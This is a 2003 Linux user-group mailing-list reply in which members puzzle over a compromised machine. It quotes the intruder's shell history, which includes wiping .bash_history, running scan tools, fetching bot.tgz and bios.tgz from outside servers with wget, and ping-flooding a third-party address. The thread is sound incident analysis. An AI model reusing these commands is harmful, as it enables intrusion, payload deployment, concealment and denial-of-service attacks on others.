[TCLUG] My linux has died

Thu Aug 21 08:25:29 CDT 2003

On Thu, 2003-08-21 at 08:11, Brady Hegberg wrote:
> Looks like you've got Romanian script kiddies in your computer.  Well,
> they have stuff stashed on Romanian servers anyway.  I'm curious about
> this stuff myself.  I guess bot.tgz is a program that flood pings
> 203.144.243.10 (Asahi-Somboon ONLINE?)  What's bios.tgz?  And what are
> the scan and serv commands doing with those IP addresses?  Hmmm?

scan and serv was defiantly something they installed on the machine.
bios.tgz & bot.tgz could be anything. They removed the history at least
once so who know what else they did. They were idiots though. Why didn't
they remove the history when they were done? If they didn't crash his
system they could still be using it right now. They probably sniffed his
passwords. I think he was using ftp to access all his files from windows
systems.

> > 
> > 
> > 
> > history
> > rm -rf .bash_history
> > ls -al
> > w
> > cd /tmp/.cfg/
> > cd samba
> > ./scan 217 139 97 1
> > ./scan 62 139 217 98
> > ./serv 67.160.4.66
> > ./scan 67 139 160 4
> > ./scan 217 139 0 1
> > ls -alF
> > cat /etc/issue
> > tar
> > cd /tmp
> > cd sh
> > ls -alF
> > tar -xzvf sh.tgz
> > exit
> > id
> > wget djcc.go.ro/bios.tgz
> > tar -xzvf bios.tgz
> > tar -xzvf bios.tgz
> > ls
> > rm -rf bios.tgz
> > ls
> > ps -aux
> > cat /proc/cpuinfo
> > exit
> > chmod 700 inst
> > chmod +x inst
> > exit
> > mkdir /dev/targa
> > cd /dev/targa
> > wget mihai-doini.org/bot.tgz
> > tar -xzvf bot.tgz
> > exit
> > ping -s -f 203.144.243.10 65500&
> > ping -f -s 203.144.243.10 65500&
> > ping -s -f 203.144.243.10 65500&
> > ls
> > cd /
> > ping -s -f 203.144.243.10 65500&
> > history | more
> > history | vim
> > history -w /tmp/hist.txt
> > 
> > 
> > 
> > _______________________________________________
> > TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
> > http://www.mn-linux.org tclug-list at mn-linux.org
> > https://mailman.real-time.com/mailman/listinfo/tclug-list
> 
> 
> _______________________________________________
> TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
> http://www.mn-linux.org tclug-list at mn-linux.org
> https://mailman.real-time.com/mailman/listinfo/tclug-list
-- 
Tom Penney <blots at visi.com>

_______________________________________________
TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
http://www.mn-linux.org tclug-list at mn-linux.org
https://mailman.real-time.com/mailman/listinfo/tclug-list